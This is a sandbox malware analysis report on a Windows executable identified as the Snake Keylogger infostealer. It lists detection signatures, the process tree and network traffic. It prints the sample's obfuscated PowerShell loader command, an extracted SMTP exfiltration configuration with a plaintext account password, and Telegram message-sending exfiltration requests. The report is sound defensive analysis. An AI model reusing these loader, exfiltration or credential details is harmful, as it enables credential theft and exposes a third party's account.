Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TjoY7n65om.exe

Overview

General Information

Sample name:TjoY7n65om.exe
renamed because original name is a hash value
Original sample name:fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe
Analysis ID:1588340
MD5:6a5b8c6057dff681139fd609ffc6b21d
SHA1:b37b7a2168980b4772978a640ebf5a02f41697e6
SHA256:fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • TjoY7n65om.exe (PID: 7844 cmdline: "C:\Users\user\Desktop\TjoY7n65om.exe" MD5: 6A5B8C6057DFF681139FD609FFC6B21D)
    • powershell.exe (PID: 6464 cmdline: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Bivejens.exe (PID: 8056 cmdline: "C:\Users\user\AppData\Local\Temp\Bivejens.exe" MD5: 6A5B8C6057DFF681139FD609FFC6B21D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "atu.petronila@burgosatu.es", "Password": "55#cHsR%iCPw", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    Process Memory Space: Bivejens.exe PID: 8056JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: Bivejens.exe PID: 8056JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" , CommandLine: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TjoY7n65om.exe", ParentImage: C:\Users\user\Desktop\TjoY7n65om.exe, ParentProcessId: 7844, ParentProcessName: TjoY7n65om.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" , ProcessId: 6464, ProcessName: powershell.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" , CommandLine: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TjoY7n65om.exe", ParentImage: C:\Users\user\Desktop\TjoY7n65om.exe, ParentProcessId: 7844, ParentProcessName: TjoY7n65om.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" , ProcessId: 6464, ProcessName: powershell.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-11T00:41:20.673469+010028033053Unknown Traffic192.168.2.1049931104.21.80.1443TCP
        2025-01-11T00:41:21.953171+010028033053Unknown Traffic192.168.2.1049943104.21.80.1443TCP
        2025-01-11T00:41:23.274530+010028033053Unknown Traffic192.168.2.1049954104.21.80.1443TCP
        2025-01-11T00:41:26.003606+010028033053Unknown Traffic192.168.2.1049974104.21.80.1443TCP
        2025-01-11T00:41:28.646313+010028033053Unknown Traffic192.168.2.1049984104.21.80.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-11T00:41:18.936105+010028032742Potentially Bad Traffic192.168.2.1049918132.226.247.7380TCP
        2025-01-11T00:41:20.107915+010028032742Potentially Bad Traffic192.168.2.1049918132.226.247.7380TCP
        2025-01-11T00:41:21.404875+010028032742Potentially Bad Traffic192.168.2.1049937132.226.247.7380TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-11T00:41:13.947470+010028032702Potentially Bad Traffic192.168.2.1049883142.250.181.238443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-11T00:41:30.912977+010018100071Potentially Bad Traffic192.168.2.1049987149.154.167.220443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "atu.petronila@burgosatu.es", "Password": "55#cHsR%iCPw", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeReversingLabs: Detection: 50%
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeVirustotal: Detection: 65%Perma Link
        Source: TjoY7n65om.exeReversingLabs: Detection: 50%
        Source: TjoY7n65om.exeVirustotal: Detection: 65%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

        Location Tracking

        barindex
        Source: unknownDNS query: name: reallyfreegeoip.org
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219187A8 CryptUnprotectData,5_2_219187A8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21918EF1 CryptUnprotectData,5_2_21918EF1
        Source: TjoY7n65om.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49925 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.10:49883 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.10:49890 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49987 version: TLS 1.2
        Source: TjoY7n65om.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_00402868 LdrInitializeThunk,FindFirstFileW,5_2_00402868
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_004065C7 FindFirstFileW,FindClose,5_2_004065C7
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindNextFileW,FindClose,LdrInitializeThunk,LdrInitializeThunk,5_2_00405996
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21092C19h5_2_21092968
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 210931E0h5_2_21092DC8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2109CF49h5_2_2109CCA0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21090D0Dh5_2_21090B30
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21091697h5_2_21090B30
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 210931E0h5_2_2109310E
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2109D7F9h5_2_2109D550
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2109DC51h5_2_2109D9A8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 210931E0h5_2_21092DB8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2109FAB9h5_2_2109F810
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_21090040
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_21090853
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2109D3A1h5_2_2109D0F8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2109EDB1h5_2_2109EB08
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2109F209h5_2_2109EF60
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2109F661h5_2_2109F3B8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2109E0A9h5_2_2109DE00
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2109E501h5_2_2109E258
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_21090673
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2109E959h5_2_2109E6B0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21910B99h5_2_219108F0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21919280h5_2_21918FB0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21917EB5h5_2_21917B78
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21911449h5_2_219111A0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191ECA6h5_2_2191E9D8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219118A1h5_2_219115F8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191CCB6h5_2_2191C9E8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191C826h5_2_2191C558
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191E816h5_2_2191E548
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21910FF1h5_2_21910D48
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21910741h5_2_21910498
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21916733h5_2_21916488
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191E386h5_2_2191E0B8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191C396h5_2_2191C0C8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219132B1h5_2_21913008
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219162D9h5_2_21916030
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191BF06h5_2_2191BC38
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191DEF6h5_2_2191DC28
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219102E9h5_2_21910040
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21913709h5_2_21913460
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191DA66h5_2_2191D798
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21915A29h5_2_21915780
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191FA56h5_2_2191F788
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21912E59h5_2_21912BB0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191BA76h5_2_2191B7A8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21915E81h5_2_21915BD8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191B5E6h5_2_2191B318
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219125A9h5_2_21912300
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191D5D6h5_2_2191D308
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219179C9h5_2_21917720
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219155D1h5_2_21915328
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21912A01h5_2_21912758
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21912151h5_2_21911EA8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21915179h5_2_21914ED0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21917571h5_2_219172C8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191F5C6h5_2_2191F2F8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21916CC1h5_2_21916A18
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219148C9h5_2_21914620
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21911CF9h5_2_21911A50
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21917119h5_2_21916E70
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191D146h5_2_2191CE78
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21914D21h5_2_21914A78
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2191F136h5_2_2191EE68
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21989478h5_2_21989180
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21986347h5_2_21985FD8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21986970h5_2_21986678
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21985066h5_2_21984D98
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21987C90h5_2_21987998
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198EA88h5_2_2198E790
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21982756h5_2_21982488
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198BF80h5_2_2198BC88
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198154Eh5_2_21981280
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21985986h5_2_219856B8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21988FB0h5_2_21988CB8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198FDA8h5_2_2198FAB0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21983076h5_2_21982DA8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198D2A0h5_2_2198CFA8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21981E47h5_2_21981BA0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198A798h5_2_2198A4A0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198A2D0h5_2_21989FD8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198079Eh5_2_219804D0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219877C8h5_2_219874D0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21983996h5_2_219836C8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198E5C0h5_2_2198E2C8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198BAB8h5_2_2198B7C0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219822C6h5_2_21981FF8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198B5F0h5_2_2198B2F8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219810BEh5_2_21980DF0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21988AE8h5_2_219887F0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219842B6h5_2_21983FE8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198F8E0h5_2_2198F5E8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198CDD8h5_2_2198CAE0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21982BE6h5_2_21982918
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198C910h5_2_2198C618
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219819DEh5_2_21981710
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21989E08h5_2_21989B10
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21984BD7h5_2_21984908
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21987300h5_2_21987008
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198E0F8h5_2_2198DE00
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21983506h5_2_21983238
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198DC30h5_2_2198D938
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198B128h5_2_2198AE30
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219854F6h5_2_21985228
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21988620h5_2_21988328
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198F418h5_2_2198F120
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21983E26h5_2_21983B58
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198EF50h5_2_2198EC58
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198C448h5_2_2198C150
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21985E16h5_2_21985B48
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21989940h5_2_21989648
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198030Eh5_2_21980040
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21986E38h5_2_21986B40
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21984746h5_2_21984478
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198D768h5_2_2198D470
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 2198AC60h5_2_2198A968
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21980C2Eh5_2_21980960
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 21988158h5_2_21987E60
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219B1FE8h5_2_219B1CF0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219B0CC8h5_2_219B09D0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219B0801h5_2_219B0508
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219B1658h5_2_219B1360
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219B1190h5_2_219B0E98
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219B1B20h5_2_219B1828
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then jmp 219B0338h5_2_219B0040
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_21B33E70
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_21B309EA
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_21B30A10

        Networking

        barindex
        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49987 -> 149.154.167.220:443
        Source: unknownDNS query: name: api.telegram.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:06:33%0D%0ACountry%20Name:%20United%20States%0D%0A[%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
        Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
        Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownDNS query: name: checkip.dyndns.org
        Source: unknownDNS query: name: reallyfreegeoip.org
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49937 -> 132.226.247.73:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49918 -> 132.226.247.73:80
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49974 -> 104.21.80.1:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49943 -> 104.21.80.1:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49984 -> 104.21.80.1:443
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49883 -> 142.250.181.238:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49954 -> 104.21.80.1:443
